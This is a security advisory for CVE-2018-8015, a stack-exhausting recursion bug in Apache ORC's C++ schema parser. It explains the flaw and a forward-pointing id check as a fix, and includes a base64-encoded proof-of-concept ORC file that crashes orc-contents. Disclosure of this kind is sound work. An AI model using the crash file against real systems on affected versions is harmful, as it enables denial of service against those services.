CVE-2018-8015: Denial of Service in Apache ORC

A malformed ORC file can trigger unbounded recursion in the C++ parser, which exhausts the stack and results in a segmentation fault.

The impact of this bug is most likely denial of service against software that uses the C++ ORC file parser, but it may also lead to code execution.

The Java parser is similarly affected, but a stack overflow in Java simply results in a StackOverflowError being thrown rather than a crash of the process.

Affected Versions

According to the Apache ORC team, Apache ORC versions 1.0.0 to 1.4.3 are affected.

Description

The vulnerable code is in c++/src/TypeImpl.cc and is triggered when parsing the schema contained in the Footer section of the ORC file.

An ORC database schema is defined as a type tree. The root of any ORC database is a Struct, which can contain other types, including another Struct. In the Footer section, the type tree is encoded as a linked-list-like structure in which compound types such as a Struct contain ids pointing to their subtypes.
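To make the encoding concrete, here is a minimal sketch of a flattened type list and a function that rebuilds the schema by following subtype ids. The names FlatType, Kind, makeValidFooterTypes and describe are hypothetical stand-ins invented for this illustration; they are not the real proto::Type or any ORC API.

```cpp
#include <cassert>
#include <cstdint>
#include <string>
#include <vector>

// Hypothetical, simplified stand-in for one Footer type entry.
enum class Kind { INT, STRING, STRUCT };

struct FlatType {
  Kind kind;
  std::vector<uint32_t> subtypes;       // ids (indices) into the flat type list
  std::vector<std::string> fieldNames;  // one name per subtype
};

// Schema struct<a:int,b:struct<c:string>> flattened in pre-order:
//   0: struct(a -> 1, b -> 2)
//   1: int
//   2: struct(c -> 3)
//   3: string
std::vector<FlatType> makeValidFooterTypes() {
  return {
    {Kind::STRUCT, {1, 2}, {"a", "b"}},
    {Kind::INT, {}, {}},
    {Kind::STRUCT, {3}, {"c"}},
    {Kind::STRING, {}, {}},
  };
}

// Rebuild a readable schema string by recursively following subtype ids.
// Like the vulnerable parser, this trusts the ids and never checks for cycles.
std::string describe(const std::vector<FlatType>& types, uint32_t id) {
  const FlatType& t = types.at(id);
  switch (t.kind) {
    case Kind::INT:
      return "int";
    case Kind::STRING:
      return "string";
    case Kind::STRUCT: {
      assert(t.subtypes.size() == t.fieldNames.size());
      std::string out = "struct<";
      for (size_t i = 0; i < t.subtypes.size(); ++i) {
        if (i > 0) out += ",";
        out += t.fieldNames[i] + ":" + describe(types, t.subtypes[i]);
      }
      return out + ">";
    }
  }
  return "?";
}
```

Calling describe(makeValidFooterTypes(), 0) returns struct<a:int,b:struct<c:string>>. The excerpt that follows is the corresponding conversion code from c++/src/TypeImpl.cc.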

    case proto::Type_Kind_STRUCT: {
      TypeImpl* result = new TypeImpl(STRUCT);
      uint64_t size = static_cast<uint64_t>(type.subtypes_size());
      std::vector<Type*> typeList(size);
      std::vector<std::string> fieldList(size);
      for(int i=0; i < type.subtypes_size(); ++i) {
        result->addStructField(type.fieldnames(i),
                               convertType(footer.types(static_cast<int>
                                                        (type.subtypes(i))),
                                           footer));
      }
      return std::unique_ptr<Type>(result);
    }

The above code parses the type tree encoded in the Footer section. When it encounters a Struct (or Union) type, it recursively parses all of its subtypes. However, it does not account for the case where a subtype id points back to the parent type (or to any other ancestor). This results in endless recursion that eventually overflows the stack.
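One way to reject such a footer before any recursion happens is to check that every subtype id points strictly forward in the type list, which a pre-order flattening of a well-formed tree always satisfies. The sketch below illustrates that idea under simplified assumptions; TypeEntry, typeIdsPointForward and the two sample builders are hypothetical names, and this is not necessarily the check that upstream shipped.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

// Hypothetical, simplified footer entry: only the subtype ids matter here.
struct TypeEntry {
  std::vector<uint32_t> subtypes;
};

// Returns true only if every subtype id is in range and strictly greater
// than the id of the type that refers to it. If this holds, following
// subtype ids always moves forward in the list, so recursion must terminate.
bool typeIdsPointForward(const std::vector<TypeEntry>& types) {
  for (std::size_t id = 0; id < types.size(); ++id) {
    for (uint32_t child : types[id].subtypes) {
      if (child >= types.size()) return false;  // dangling reference
      if (child <= id) return false;            // self or backward reference
    }
  }
  return true;
}

// Well-formed sample: 0 -> {1, 2}, 2 -> {3}.
std::vector<TypeEntry> makeValidTypes() {
  std::vector<TypeEntry> types(4);
  types[0].subtypes = {1, 2};
  types[2].subtypes = {3};
  return types;
}

// Malformed sample (illustrative only, not a decoding of poc.orc):
// type 1 lists its own parent, type 0, as a subtype.
std::vector<TypeEntry> makeCyclicTypes() {
  std::vector<TypeEntry> types(2);
  types[0].subtypes = {1};
  types[1].subtypes = {0};
  return types;
}
```

With these samples, typeIdsPointForward(makeValidTypes()) is true and typeIdsPointForward(makeCyclicTypes()) is false. A parser could run a check of this kind once over the Footer and refuse the file before converting any types.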

Proof of Concept

The file poc.orc is included here in base64-encoded form.

CAMQ9AMaACILCAwSAQEaBEFBQUEiCwgMEgEAGgRBQUFBKgA6AAglEAAiAgAMMAaC
9AMDT1JDEQgDEPQDGgAiCwgMEgEBGgRBQUFBIgsIDBIBABoEQUFBQSoAOgAIJRAA
IgIADDAGgvQDA09SQxE=

Attempting to parse the file with orc-contents results in a segmentation fault.

$ ./orc-contents poc.orc
Segmentation fault

Credits

This issue was discovered by Terry Chia (Ayrx).

Timeline
